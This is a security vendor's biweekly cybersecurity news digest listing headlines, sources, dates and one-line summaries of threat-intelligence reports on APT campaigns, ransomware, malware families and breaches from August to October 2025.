Source: Microsoft Security Blog
(Published: 20 October 2025)
Azure Blob Storage is a high-value target for threat actors due to its critical role in storing and managing massive amounts of unstructured data at scale. Read more.

North Korea’s Contagious Interview Campaign Escalates: 338 Malicious npm Packages, 50,000 Downloads

Source: Socket
(Published: 10 October 2025)
The Contagious Interview operation continues to weaponize the npm registry with a repeatable playbook. Read more.

Espionage Exposed: Inside a North Korean Remote Worker Network

Source: KELA
(Published: 10 October 2025)
Thousands of North Korean IT workers are hiding in plain sight, blending into the global freelance economy, building your apps, or even designing your infrastructure. Read more.

Microsoft revamps Internet Explorer Mode in Edge after August attacks

Source: Security Affairs
(Published: 13 October 2025)
Microsoft has revamped the Internet Explorer (IE) mode in the Edge browser to fix an issue that threat actors exploited for attacks in August 2025. Read more.

TigerJack’s Extensions Continue to Rob Developers Blind Across Different Marketplaces

Source: Koi
(Published: 13 October 2025)
Meet TigerJack – a threat actor we’ve been tracking since early 2025, who has systematically infiltrated developer marketplaces with at least 11 malicious VS Code extensions across multiple publisher accounts. Read more.

Oracle silently fixes zero-day exploit leaked by ShinyHunters

Source: BleepingComputer
(Published: 14 October 2025)
Oracle has silently fixed an Oracle E-Business Suite vulnerability (CVE-2025-61884) that was actively exploited to breach servers, with a proof-of-concept exploit publicly leaked by the ShinyHunters extortion group. Read more.

Want more articles? Check out the previous edition of Security Signals here.

Take advantage of our free data evaluation.

REQUEST NOW

Security Signals (09/23/25-10/7/25)

Cybersecurity News

Welcome to your biweekly digest of curated cybersecurity intelligence.

For more articles, check out our #onpatrol4malware blog.

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators OSINT feeds help you apply them.

SUBSCRIBE FOR FREE

This Edition’s Articles

Late September to early October 2025 cybersec news: Oracle, Red Hat, Cisco and Discord! High-profile corporate breaches and exploited vulnerabilties, persistent APT campaigns, and novel malware variants dominated the threat landscape. Enterprise vendors patched critical flaws, ransomware crews refined their tactics, and state-linked actors expanded their global reach, all underscoring the need for continuous vigilance.

YiBackdoor: A New Malware Family With Links to IcedID and Latrodectus

Source: Zscaler
(Published: 23 September 2025)
Zscaler ThreatLabz has identified a new malware family that we named YiBackdoor, which was first observed in June 2025. Read more.

Lazarus Group: A Criminal Syndicate With a Flag

Source: Barracuda
(Published: 23 September 2025)
The Lazarus Group is a notorious state-sponsored cybercrime organization linked to the Democratic People’s Republic of Korea (DPRK). Read more.

Fighting Telecom Cyberattacks: Investigating a Campaign Against UK Companies

Source: ANY.RUN
(Published: 24 September 2025)
Telecommunications companies are the digital arteries of modern civilization. Read more.

ED 25-03: Identify and Mitigate Potential Compromise of Cisco Devices

Source: Cybersecurity and Infrastructure Security Agency (CISA)
(Published: 25 September 2025)
This page contains a web-friendly version of CISA Emergency Directive 25-03: Identify and Mitigate Potential Compromise of Cisco Devices. Read more.

Smash and Grab: Aggressive Akira Campaign Targets SonicWall VPNs, Deploys Ransomware in an Hour or Less

Source: Arctic Wolf
(Published: 26 September 2025)
Since late July 2025, Arctic Wolf has observed an ongoing surge in Akira ransomware activity targeting SonicWall firewalls through malicious SSL VPN logins. Read more.

Cavalry Werewolf raids Russia’s public sector with trusted relationship attacks

Source: BI.ZONE
(Published: 2 October 2025)
BI.ZONE Threat Intelligence recorded Cavalry Werewolf activity from May to August 2025. Read more.

CERT-UA warns UAC-0245 targets Ukraine with CABINETRAT backdoor

Source: Security Affairs
(Published: 2 October 2025)
The Computer Emergency Response Team of Ukraine (CERT-UA) warned of cyberattacks by the group UAC-0245 using the CABINETRAT backdoor. Read more.

Update on a Security Incident Involving Third-Party Customer Service

Source: Discord
(Published: 3 October 2025)
At Discord, protecting the privacy and security of our users is a top priority. Read more.

Palo Alto Scanning Surges ~500% in 48 Hours, Marking 90-Day High

Source: GreyNoise
(Published: 3 October 2025)
On October 3, 2025, GreyNoise observed a ~500% increase in IPs scanning Palo Alto Networks login portals, the highest level recorded in the past 90 days. Read more.

Lunar Spider Expands Their Web via FakeCaptcha

Source: NVISO Labs
(Published: 1 October 2025)
Lunar Spider is increasingly using phishing kits disguised as CAPTCHA widgets to drive credential theft. Read more.

Silent Smishing: The Hidden Abuse of Cellular Router APIs

Source: SEKOIA
(Published: 2 October 2025)
Attackers are increasingly exploiting APIs in cellular routers to perform silent smishing without user awareness. Read more.

UAT-8099: Chinese-Speaking Cybercrime Group SEO Fraud Campaign

Source: Talos
(Published: 3 October 2025)
Talos has observed a campaign dubbed UAT-8099 in which a Chinese-speaking threat group uses SEO-fraud techniques to drive traffic to malicious sites. Read more.

Detour Dog DNS Malware Powers Strela Stealer Campaigns

Source: Infoblox Threat Intelligence
(Published: 3 October 2025)
A new DNS-based malware loader named Detour Dog is being used to deliver Strela Stealer in targeted attacks. Read more.

BrickStorm: New Espionage Campaign Targeting Cloud Assets

Source: Google Cloud Blog
(Published: 4 October 2025)
BrickStorm is a newly uncovered espionage campaign that targets cloud infrastructure with credential harvesting and lateral movement. Read more.

UNC6040: Proactive Hardening Recommendations

Source: Google Cloud Blog
(Published: 5 October 2025)
The UNC6040 cluster has been active in recent months; here are recommended proactive hardening steps to reduce exposure. Read more.

Inside Vietnamese Threat Actor “Lone None’s” Copyright Takedown Spoofing Campaign

Source: Cofense
(Published: 6 October 2025)
A Vietnamese threat actor dubbed “Lone None” has been using fraudulent copyright takedown notices to trick companies into redirecting their domains. Read more.

Raytheon Confirms Ransomware Attack on Airline Check-In Systems

Source: CyberInsider
(Published: 7 October 2025)
Raytheon Technologies has publicly acknowledged a ransomware intrusion into airline check-in infrastructure. Read more.

BreachStars Emerges as BreachForums Replacement Marketplace

Source: CyberNews
(Published: 7 October 2025)
BreachStars is positioning itself as a successor to the shuttered BreachForums, offering data-leak marketplace services. Read more.

NIST Warns of Flawed DeepSeek: Security CCP Narratives

Source: CyberNews
(Published: 4 October 2025)
The U.S. National Institute of Standards and Technology (NIST) has flagged flaws in DeepSeek that may amplify CCP information narratives. Read more.

Inside Salt Typhoon: China’s State-Corporate Advanced Persistent Threat

Source: DomainTools Investigations (DTI)
(Published: 24 September 2025)
Salt Typhoon is a Chinese state-sponsored cyber threat group aligned with the Ministry of State Security (MSS), specializing in long-term espionage operations targeting global telecommunications infrastructure. Read more.

Better Analyzing Foreign Adversary Threats to Open-Source Software

Source: Margin Research
(Published: 30 September 2025)
Global contributions to open-source software (OSS) add tremendous value: for years, they have forged connections between developers around the world, enabled dispersed and specialized talent to build better software for users, and collectively helped ensure that OSS remains available, updated, and relevant for users everywhere. Read more.

TradingView Scam Expands to Google Ads & YouTube

Source: HackRead
(Published: 26 September 2025)
A malicious advertising campaign that has been tricking content creators and unsuspecting users into downloading harmful software by offering “free access” to TradingView Premium has dramatically expanded its operations. Read more.

Operation SouthNet: SideWinder Expands Phishing & Malware in South Asia

Source: Hunt.io
(Published: 1 October 2025)
APT SideWinder, a highly active state-sponsored threat group known for its long-standing espionage campaigns across South Asia, has once again launched a targeted operation. Read more.

Breakingdown of Patchwork APT

Source: K7 Labs
(Published: October 2025)
It enforces the use of TLS 1.2 to ensure secure, encrypted transmission and sends the POST request containing the encoded victim data to the C2. Read more.

Patchwork APT Exploits Macros & Scheduled Tasks for Stealthy C2/Exfil

Source: Varutra / ThreatPost
(Published: 1 October 2025)
Patchwork (aka Dropping Elephant/Monsoon/Hangover Group) is an APT active since at least 2015 targeting political and military intelligence across South and Southeast Asia. Read more.

Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite

Source: Unit 42 / Palo Alto Networks
(Published: 30 September 2025)
After a two-and-a-half-year investigation, Palo Alto Networks Unit 42 has formally named a sophisticated, Chinese nation-state actor: Phantom Taurus. Read more.

DrayTek warns of remote code execution bug in Vigor routers

Source: BleepingComputer
(Published: 2 October 2025)
Networking hardware maker DrayTek released an advisory to warn about a security vulnerability in several Vigor router models that could allow unauthenticated actors to perform arbitrary code execution. Read more.

Oracle patches EBS zero-day exploited in Clop data theft attacks

Source: BleepingComputer
(Published: 3 October 2025)
Oracle has released emergency patches for a zero-day vulnerability in its EBS software suite that was being actively exploited by Clop ransomware actors in data theft campaigns. Read more.

Klopatra: Exposing a new Android banking Trojan operation with roots in Turkey

Source: Cleafy Labs
(Published: 30 September 2025)
A previously undocumented Android banking trojan called Klopatra has compromised over 3,000 devices, leveraging hidden VNC and overlay techniques to conduct fraudulent transactions. Read more.

Yurei Ransomware: The Digital Ghost

Source: Cyfirma
(Published: 1 October 2025)
The Yurei ransomware is unique in its modular architecture and stealthy data-exfiltration staging ahead of encryption. Read more.

Revisiting WarmCookie: Memory-Based Cookie Abuse Techniques

Source: Elastic Security Labs
(Published: 2 October 2025)
Elastic’s security labs analyzed “WarmCookie,” a technique that abuses in-memory cookie structures to facilitate stealthy session hijacking. Read more.

USD 439 Million Recovered in Global Financial Crime Operation

Source: INTERPOL
(Published: 2 October 2025)
INTERPOL announced the recovery of USD 439 million following coordinated takedowns of transnational financial crime networks. Read more.

Red Hat confirms major data breach

Source: The Cyber Security Hub / LinkedIn
(Published: 3 October 2025)
Red Hat has acknowledged a data breach affecting its infrastructure, exposing internal systems and potentially impacting enterprise customers. Read more.

XCSSET evolves again: analyzing the latest updates to XCSSET’s inventory

Source: Microsoft Security Blog
(Published: 25 September 2025)
Microsoft details the latest evolutions of the XCSSET iOS/macOS malware family, tracking new features and command modules. Read more.

Persistent malicious targeting of Cisco devices

Source: UK National Cyber Security Centre (NCSC)
(Published: 4 October 2025)
The UK NCSC warns of ongoing campaigns targeting Cisco network gear, including VPNs and switches, seeking to exploit known vulnerabilities. Read more.

RedNovember targets government, defense, and technology organizations

Source: Recorded Future
(Published: 4 October 2025)
The RedNovember campaign focuses on intelligence collection, using custom backdoors to infiltrate national governments and defense contractors. Read more.

LameHug: AI-Driven Malware & LLM Cyber Intrusion Analysis

Source: Splunk Security Blog
(Published: 4 October 2025)
Splunk researchers explore “LameHug,” a proof-of-concept malware that uses large language models to adapt actions based on environment feedback. Read more.

Self-propagating malware spreads via WhatsApp

Source: Trend Micro Research
(Published: 5 October 2025)
A new self-propagating worm exploits WhatsApp forwarding mechanics to spread, bypassing typical app store oversight. Read more.

US Secret Service blocks massive telecom attack in New York

Source: Trustwave SpiderLabs Blog
(Published: 5 October 2025)
The U.S. Secret Service intervened to disrupt a large-scale telecom infrastructure attack in New York orchestrated by a state-aligned actor. Read more.

Salesforce leak, extortion attempts tied to Scatterered / Lapsus Hunters

Source: UpGuard Blog
(Published: 6 October 2025)
UpGuard discloses a data leak and ongoing extortion campaign from the group “Scatterered / Lapsus Hunters,” with exposed Salesforce credentials circulating online. Read more.

Want more articles? Check out the previous edition of Security Signals here.

Take advantage of our free data evaluation.

REQUEST NOW

Security Signals (09/09/25 – 09/23/25)

Cybersecurity News

???

Welcome to your biweekly digest of curated cybersecurity intelligence.

For more articles, check out our #onpatrol4malware blog.

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators OSINT feeds help you apply them.

SUBSCRIBE FOR FREE

This Edition’s Articles

Analysis of Backdoor.WIN32.Buterat

Source: Point Wild
(Published: 9 September 2025)
Backdoor malware is a covert type of malicious software designed to bypass standard authentication mechanisms and provide persistent, unauthorized access to compromised systems. Read more.

Threat Actor Accidentally Exposes AI-Powered Operations

Source: Infosecurity Magazine
(Published: 9 September 2025)
A threat actor has unintentionally revealed their methods and day-to-day activities after installing Huntress security software on their own environment. Read more.

AsyncRAT in Action: Fileless Malware Techniques and Analysis of a Remote Access Trojan

Source: LevelBlue
(Published: 10 September 2025)
Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution. Read more.

New FileFix Campaign Goes Beyond PoC and Leverages Steganography

Source: Acronis / Tru
(Published: 10 September 2025)
Acronis Threat Research has observed a new FileFix campaign that uses steganographic embedding of payloads to evade detection. Read more.

Uncloaking TA415: China-Aligned Actor Conducts US-China Economic Relations Attacks

Source: Proofpoint
(Published: 11 September 2025)
Proofpoint has published findings on TA415, a China-aligned threat actor, revealing operations targeting US–China economic relations. Read more.

Threat Spotlight: ShinyHunters Data Breach Targets Salesforce Amid Scattered Spider Collaboration

Source: ReliaQuest
(Published: 11 September 2025)
ReliaQuest has observed a coordinated campaign where ShinyHunters collaborated with Scattered Spider to breach Salesforce environments. Read more.

Yurei & The Ghost of Open Source Ransomware

Source: Check Point Research
(Published: 12 September 2025)
First observed on September 5, Yurei is a newly emerged ransomware group that targeted a Sri Lankan food manufacturing company as its first leaked victim. Read more.

Modified ZLoader Variants & Updates Analyzed

Source: Zscaler
(Published: 15 September 2025)
Zscaler ThreatLabz has published new technical findings on recent updates and modifications to the ZLoader malware family. Read more.

Supporting Rowhammer Research to Understand Vulnerabilities in Memory Hardware

Source: Google Security Blog
(Published: 16 September 2025)
Google researchers detail new findings on Rowhammer and how fundamental memory hardware vulnerabilities can be further studied. Read more.

EggStreme Malware: Unpacking a New APT Framework Targeting a Philippine Military Company

Source: Bitdefender
(Published: 17 September 2025)
This report analyzes a sophisticated cyber-attack targeting a military company based in the Philippines, which led to the discovery of a new and advanced malware toolset. Read more.

HIVE0154 Drops Updated ToneShell Backdoor

Source: IBM X-Force
(Published: 17 September 2025)
IBM X-Force has uncovered HIVE0154, a threat actor exerting updated ToneShell backdoor variants in the wild. Read more.

ShadowV2: An Emerging DDoS-for-Hire Botnet

Source: Darktrace
(Published: 18 September 2025)
Darktrace reports on ShadowV2, a botnet-as-a-service model built for DDoS operations and evolving evasion tactics. Read more.

How Attackers Abuse ScreenConnect and Open Directories (AsyncRAT Campaigns Uncovered)

Source: Hunt.io
(Published: 18 September 2025)
Research shows how attackers are abusing ScreenConnect installers hosted in open directories to deliver AsyncRAT payloads. Read more.

Modus Operandi of “Subtle Snail” Threat Group

Source: Prodaft / Catalyst
(Published: 19 September 2025)
Prodaft’s Catalyst team describes the TTPs, infrastructure, and attack cycles of the Subtle Snail threat group. Read more.

Inside China’s Surveillance and Propaganda Industries: Where Profit Meets Party

Source: The Diplomat
(Published: 21 September 2025)
The Diplomat explores how China monetizes surveillance and propaganda within its media, tech, and security sectors. Read more.

Cybersecurity Incident at European Airports Caused by Ransomware

Source: SCWorld
(Published: 22 September 2025)
Several European airports have reported system outages traced to a ransomware attack affecting operational systems. Read more.

MalTerminal: An LLM-Enabled Malware Pioneer Exposed

Source: SecurityAffairs
(Published: 23 September 2025)
SecurityAffairs researchers have published a deep dive on MalTerminal, a new malware leveraging large language models to aid operators. Read more.

Technical Analysis of kkRAT

Source: Zscaler (ThreatLabz)
(Published: 10 September 2025)
Zscaler ThreatLabz has identified a malware campaign targeting Chinese-speaking users, active since early May 2025. Read more.

ChillyHell – a modular macOS backdoor

Source: Jamf Threat Labs
(Published: 8 September 2025)
During routine sample analysis, Jamf Threat Labs discovered a macOS backdoor showing a distinctive approach to process reconnaissance. Read more.

Uncloaking VoidProxy: a Novel and Evasive Phishing-as-a-Service Framework

Source: Okta Security
(Published: 11 September 2025)
Okta Threat Intelligence details a previously unreported Phishing-as-a-Service operation dubbed VoidProxy. Read more.

Introducing HybridPetya: Petya/NotPetya copycat with UEFI Secure Boot bypass

Source: ESET / WeLiveSecurity
(Published: 12 September 2025)
ESET Research has discovered HybridPetya on VirusTotal, showing traits reminiscent of Petya/NotPetya with a Secure Boot bypass. Read more.

Inside Maranhão Stealer: Node.js-Powered InfoStealer

Source: Cyble
(Published: 15 September 2025)
Cyble Research & Intelligence Labs detail a Node.js-based infostealer leveraging reflective DLL injection techniques. Read more.

Dark Web Profile: BQTLock Ransomware

Source: SOCRadar
(Published: 12 September 2025)
BQTLock is a RaaS that has drawn attention for disruptive operations and distinctive methods. Read more.

Threat Spotlight: Attackers Exploit Axios for Automated Phishing

Source: ReliaQuest
(Published: 9 September 2025)
ReliaQuest observed surges in stolen credentials linked to mass-automated phishing using the Axios user agent. Read more.

Going Underground: China-Aligned TA415 Conducts US-China Economic Relations Operations

Source: Proofpoint
(Published: 11 September 2025)
Proofpoint details TA415 campaigns aligned to US-China economic relations themes. Read more.

Threat Spotlight: ShinyHunters Data Breach Targets Salesforce Amid Scattered Spider Collaboration

Source: ReliaQuest
(Published: 11 September 2025)
ReliaQuest reports ShinyHunters collaborating with Scattered Spider against Salesforce targets. Read more.

China-Linked APT41 Hackers Target US Government Agencies

Source: The Hacker News
(Published: 12 September 2025)
APT41, a China-linked group, has been observed targeting US agencies through credential theft and phishing. Read more.

KILLSEC Ransomware Is Attacking Healthcare Institutions in Brazil

Source: ReSecurity
(Published: 12 September 2025)
ReSecurity tracks KILLSEC ransomware activity against Brazilian healthcare institutions. Read more.

In-Depth Analysis of the “APT Down” – The North Korea Files Leak

Source: ENKI
(Published: September 2025)
ENKI provides an in-depth analysis related to the so-called North Korea Files leak, examining potential APT ties. Read more.

Inside the Lighthouse and Lucid PhaaS Campaigns Targeting 316 Global Brands

Source: Netcraft
(Published: 17 September 2025)
Netcraft examines Lighthouse and Lucid phishing-as-a-service operations observed targeting hundreds of brands worldwide. Read more.

Want more articles? Check out the previous edition of Security Signals here.

Take advantage of our free data evaluation.

REQUEST NOW

Security Signals (08/26/25 – 09/09/25)

Cybersecurity News

Welcome to your biweekly digest of curated cybersecurity intelligence.

For more articles, check out our #onpatrol4malware blog.

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators OSINT feeds help you apply them.

SUBSCRIBE FOR FREE

This Edition’s Articles

Countering China State Actors Compromise of Networks

Source: U.S. Department of Defense
(Published: September 2025)
People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks.
Read more.

Widespread Data Theft Targets Salesforce Instances via Salesloft Drift

Source: Google Cloud Blog
(Published: 26 August 2025)
Google Threat Intelligence Group is issuing an advisory to alert organizations about a widespread data theft campaign carried out by the actor tracked as UNC6395. Read more.

Velociraptor incident response tool abused for remote access

Source: Sophos News
(Published: 26 August 2025)
In August 2025, Counter Threat Unit researchers investigated an intrusion that involved deployment of the legitimate open-source Velociraptor digital forensics and incident response tool. Read more.

Breaking Down Mustang Panda Windows Endpoint Campaign

Source: Picus Security
(Published: 26 August 2025)
Researchers detail a Mustang Panda campaign that targets Windows endpoints with phishing and DLL sideloading to gain persistence. Read more.

TAG-144’s Persistent Grip On South American Organizations

Source: Recorded Future
(Published: 26 August 2025)
Insikt Group assesses that TAG-144 continues persistent intrusions in South America using credential theft and backdoors. Read more.

Malvertising Campaign On Meta Expands To A Wider Target Base, Pushing Advanced Crypto-Stealing Malware To Users Worldwide

Source: Bitdefender Labs
(Published: 26 August 2025)
Bitdefender observed a global malvertising wave across Meta platforms that delivers advanced crypto-stealing malware. Read more.

Storm-0501’s evolving techniques lead to cloud-based ransomware

Source: Microsoft Security Blog
(Published: 27 August 2025)
Microsoft Threat Intelligence has observed financially motivated threat actor Storm-0501 continuously evolving their campaigns to focus on cloud-based tactics, techniques, and procedures. Read more.

AI-Powered Ransomware Has Arrived With ‘PromptLock’

Source: Dark Reading
(Published: 27 August 2025)
It was probably inevitable – analysts have spotted the first known ransomware strain powered by artificial intelligence. Read more.

Tamperedchef – The Bad PDF Editor

Source: Truesec
(Published: 27 August 2025)
Truesec describes a large malvertising campaign luring victims into downloading a trojanized PDF editor that steals data. Read more.

MystRodX: A Covert Dual-Mode Backdoor

Source: XLab
(Published: 27 August 2025)
MystRodX is a typical backdoor implemented in C++, supporting features like file management, port forwarding, reverse shell, and socket management.
Read more.

Malicious ScreenConnect Campaign Abuses AI-Themed Lures For XWorm Delivery

Source: Trustwave SpiderLabs
(Published: 27 August 2025)
Investigators uncovered a campaign that used fake AI content to trick users into running a preconfigured ScreenConnect installer that dropped XWorm. Read more.

From Threat To Test: Emulating Scattered Spider In Realistic Scenarios

Source: Lares Labs
(Published: 27 August 2025)
Read more.

ShadowSilk: A Cross-Border Binary Union For Data Theft

Source: Group-IB
(Published: 27 August 2025)
Read more.

Chasing the Silver Fox: Cat & Mouse in Kernel Shadows

Source: Check Point Research
(Published: 28 August 2025)
While Microsoft Windows has steadily strengthened its security model, threat actors have adapted by exploiting lower-level weaknesses that bypass these protections without triggering defenses. Read more.

Amazon disrupts watering hole campaign by Russia’s APT29

Source: AWS Security Blog
(Published: 29 August 2025)
Amazon’s threat intelligence team identified and disrupted a watering hole campaign conducted by APT29 using compromised websites to redirect visitors to malicious infrastructure. Read more.

How Attackers Adapt To Built-In macOS Protection

Source: Securelist (Kaspersky)
(Published: 29 August 2025)
Read more.

Sindoor Dropper – New Phishing Campaign

Source: Nextron Systems
(Published: 29 August 2025)
Nextron documents a new phishing wave that delivers a lightweight dropper dubbed Sindoor. Read more.

Experts Warn Of Actively Exploited FreePBX Zero-Day

Source: Security Affairs
(Published: 29 August 2025)
Researchers warn that a FreePBX zero-day is being exploited in the wild against Internet-exposed systems. Read more.

Hackers Use New HexStrike AI Tool To Rapidly Exploit N-Day Flaws

Source: BleepingComputer
(Published: 29 August 2025)
Threat actors are adopting an AI tool named HexStrike to accelerate exploitation of known vulnerabilities. Read more.

Salesloft Drift Breach: GitHub Compromise and OAuth Tokens

Source: Hackread
(Published: 07 September 2025 )
Heard about the recent data breaches where attackers used the Salesloft Drift application to access Salesforce data? There’s now a major update. Read more.

Feds Seize Veriftools.net, Relaunch Veriftools.com

Source: Hackread
(Published: 31 August 2025)
U.S. authorities seized Veriftools.net and the operators relaunched the service at a new domain. Read more.

WhatsApp Fixes A Serious Vulnerability Used In Targeted Attacks

Source: BetaNews
(Published: 01 September 2025)
WhatsApp patched a high severity flaw that was reportedly used in targeted attacks. Read more.

Three Lazarus RATs Coming For Your Cheese

Source: Fox-IT
(Published: 01 September 2025)
Fox-IT describes three Lazarus remote access trojans and their tooling used against organizations. Read more.

RapperBot: From Infection to DDoS in a Split Second

Source: Bitsight
(Published: 02 September 2025)
It was just another day at the office – a routine observation led to an investigation into RapperBot activity that quickly escalated from infection to DDoS. Read more.

Predators for Hire: A Global Overview of Commercial Surveillance Vendors

Source: Sekoia.io Blog
(Published: 02 September 2025)
Between November 2023 and July 2024, the Russia-nexus intrusion set APT29 was observed using exploits similar to those used by commercial surveillance vendors, particularly Intellexa’s Predator spyware. Read more.

Google Salesforce Breach: A Deep Dive Into The Chain And Extent Of The Compromise

Source: Seqrite
(Published: 02 September 2025)
The blog analyzes how UNC6040 used vishing and OAuth app abuse to access Google’s Salesforce instance and exfiltrate data. Read more.

Not Safe For Work: Tracking And Investigating Stealerium And Phantom Infostealers

Source: Proofpoint
(Published: 03 September 2025)
Proofpoint tracks Stealerium and Phantom operations and shares techniques, tooling, and indicators. Read more.

Analyzing NotDoor: Inside APT28’s Expanding Arsenal

Source: LAB52 (S2 Grupo)
(Published: 03 September 2025)
LAB52 identified a new Outlook backdoor attributed to APT28 that can monitor for trigger words and exfiltrate data while executing attacker commands. Read more.

Interview #7 Cyber Toufan

Source: deepdarkCTI
(Published: 03 September 2025)
Read more.

Cato CTRL Threat Research: Threat Actors Abuse Simplified AI to Steal Microsoft 365 Credentials

Source: Cato Networks
(Published: 04 September 2025)
AI marketing platforms have exploded in popularity, becoming everyday tools for creative teams in enterprises worldwide. Read more.

GhostRedirector poisons Windows servers: Backdoors with a side of Potatoes

Source: ESET WeLiveSecurity
(Published: 04 September 2025)
ESET researchers identified a new threat actor, GhostRedirector, that compromised at least 65 Windows servers mainly in Brazil, Thailand, and Vietnam. Read more.

Operation BarrelFire: NoisyBear targets entities linked to Kazakhstan’s Oil & Gas Sector.

Source: Seqrite
(Published: 04 September 2025)
Seqrite Labs APT-Team has been tracking a new threat group since April 2025 that we track as Noisy Bear, targeting entities in Central Asia’s energy sector. Read more.

Threat Actors Impersonate Microsoft Teams To Deliver Odyssey macOS Stealer Via Clickfix

Source: CloudSEK
(Published: 05 September 2025)
CloudSEK describes a fake Microsoft Teams download site that executes a base64 AppleScript to install the Odyssey macOS stealer. Read more.

Salt Typhoon 2025

Source: Silent Push
(Published: 08 September 2025 )
Silent Push has identified dozens of previously unreported domains, all aiming to obtain long-term, stealthy access to targeted organizations, used by the Chinese APT group, Salt Typhoon.
Read more.

Scattered Lapsus Hunters Leak Google Fire Experts Data

Source: Hackread
(Published: 04 September 2025)
Scattered Lapsus$ Hunters threaten Google, demanding that two security experts, one from Google’s Threat Intelligence Group and the other from Mandiant, be fired or they will leak alleged stolen Google data.
Read more.

Unmasking The Gentlemen Ransomware: Tactics, Techniques, And Procedures

Source: Trend Micro Research
(Published: 09 September 2025)
Trend Micro profiles the Gentlemen ransomware group, highlighting environment-specific evasion and abuse of legitimate tools. Read more.

Blurring The Lines: Intrusion Shows Connection With Three Major Ransomware Gangs

Source: RedPacket Security
(Published: 09 September 2025)
A DFIR case links tooling and artifacts across Play, Ransomhub, and DragonForce ransomware activity. Read more.

Pondering My Orb: A Look at PolarEdge Adjacent Infrastructure

Source: Censys
(Published: 28 August 2025 )
We explore several services and certificates that frequently accompany verified PolarEdge botnet certificates.
Read more.

TinyLoader Malware Cryptocurrency Theft Infrastructure

Source: Hunt.io
Malware loaders have become a common part of today’s cybercrime operations because they give attackers a reliable way to get into systems and then bring in whatever tools they need.
(Published: 02 September 2025 )
Read more.

Unveiling a Python Stealer: Inf0s3c Stealer

Source: Cyfirma
(Published: 29 August 2025 )
Cyfirma’s threat intelligence assessment reveals Inf0s3c Stealer, a Python-based grabber designed to collect system information and user data.
Read more.

Unmasked: Salat Stealer – A Deep Dive into its Advanced Persistence Mechanisms and C2 Infrastructure

Source: Cyfirma
(Published: 05 September 2025 )
CYFIRMA has identified Salat Stealer (also known as WEB_RAT), a sophisticated Go-based infostealer targeting Windows systems.
Read more.

Operation Hankook: Phantom North Korean APT37 Targeting South Korea

Source: Seqrite
(Published: 29 August 2025 )
Seqrite Lab has uncovered a campaign in which threat actors are leveraging the (National Intelligence Research Society Newsletter – Issue 52) as a decoy document to lure victims.
Read more.

Suspicious Domain Activity Targeting 2026 FIFA World Cup Tournament

Source: Bfore.ai
(Published: August 2025)
In the lead-up to major global events, cybercriminals are quick to launch fraudulent schemes like fake websites and counterfeit online stores.
Read more.

Scattered Spider Overview

Source: Lares Labs
(Published: 27 August 2025 )
At Lares, we specialize in threat simulation and adversarial collaboration with our clients, replicating the tactics, techniques, and procedures (TTPs) observed in the latest cybercriminal groups.
Read more.

Want more articles? Check out the previous edition of Security Signals here. Want to dive deeper into DDoS Attacks, Check out the Malware Patrol Blog Post: Spoofed DDoS Attacks and BCP 38.

Take advantage of our free data evaluation.

REQUEST NOW

Security Signals (08/12/25 – 08/26/25)

Cybersecurity News

Welcome to your biweekly digest of curated cybersecurity intelligence.

For more articles, check out our #onpatrol4malware blog.

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators OSINT feeds help you apply them.

SUBSCRIBE FOR FREE

This Edition’s Articles

Coordinated Brute Force Campaign Targets Fortinet SSL VPNs

Source: GreyNoise
(Published: 12 August 2025)
On August 3, 2025 GreyNoise observed a significant spike in brute-force traffic targeting Fortinet SSL VPNs. Read more.

Persistent Risk: XZ Utils Backdoor Still Lurking in Docker Images

Source: Binarly
(Published: 12 August 2025)
In this blog we share a new finding in the XZ Utils saga: several Docker images built around the time of the compromise contain the backdoor. Read more.

Malvertising campaign leads to PS1Bot, a multi-stage malware framework

Source: Cisco Talos
(Published: 12 August 2025)
Cisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage malware framework implemented in PowerShell and C#. Read more.

Threat Bulletin: Fire in the Woods – A New Variant of FireWood

Source: Intezer
(Published: 13 August 2025)
FireWood is a Linux backdoor discovered by ESET’s research team. Read more.

‘Blue Locker’ Analysis: Ransomware Targeting Oil and Gas Sector in Pakistan

Source: Resecurity
(Published: 14 August 2025)
This ransomware attack targeted a major enterprise in Pakistan’s oil and gas sector around the country’s Independence Day. Read more.

PhantomCard: New NFC-driven Android malware emerging in Brazil

Source: ThreatFabric
(Published: 14 August 2025)
We introduce PhantomCard, a new Android NFC-based trojan targeting banking customers in Brazil and potentially expanding globally. Read more.

CISA Warns of Attacks Exploiting N-able Vulnerabilities

Source: SecurityWeek
(Published: 14 August 2025)
CISA reported becoming aware of attacks exploiting CVE-2025-8875 and CVE-2025-8876 in N-able N-central on the day they were patched. Read more.

Ghost-Tapping and the Chinese Cybercriminal Retail Fraud Ecosystem

Source: Recorded Future
(Published: 14 August 2025)
We observed criminals buying and selling stolen goods on Telegram marketplaces such as Huione Guarantee and Xinbi Guarantee. Read more.

Cisco Discloses Critical RCE Flaw in Firewall Management Software

Source: Infosecurity Magazine
(Published: 15 August 2025)
Cisco revealed a critical RCE flaw tracked as CVE-2025-20265 and urged customers to apply software updates. Read more.

BlackMatter Ransomware Overview

Source: ANY.RUN
(Published: 18 August 2025)
BlackMatter is a fast-moving ransomware strain that encrypts local and network data, disables recovery mechanisms, and forces organizations to negotiate. Read more.

Apache ActiveMQ attackers patch critical vuln after breaking in

Source: The Register
(Published: 19 August 2025)
Criminals exploiting a critical ActiveMQ vulnerability fixed the flaw post-intrusion to help hide persistence on Linux servers. Read more.

Oregon Man Charged with Administering “Rapper Bot” DDoS-for-Hire Botnet

Source: U.S. Department of Justice (USAO-AK)
(Published: 19 August 2025)
An Oregon man was charged in Alaska for allegedly developing and administering the “Rapper Bot” DDoS-for-hire botnet. Read more.

New Research Links VPN Apps, Highlights Security Deficiencies

Source: SecurityWeek
(Published: 19 August 2025)
Citizen Lab identified links between multiple VPN providers and multiple weaknesses in their mobile apps. Read more.

A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor

Source: Google Cloud Blog (Threat Intelligence)
(Published: 20 August 2025)
Mandiant detailed a campaign where a downloader delivers CORNFLAKE.V3 malware as part of financially motivated operations. Read more.

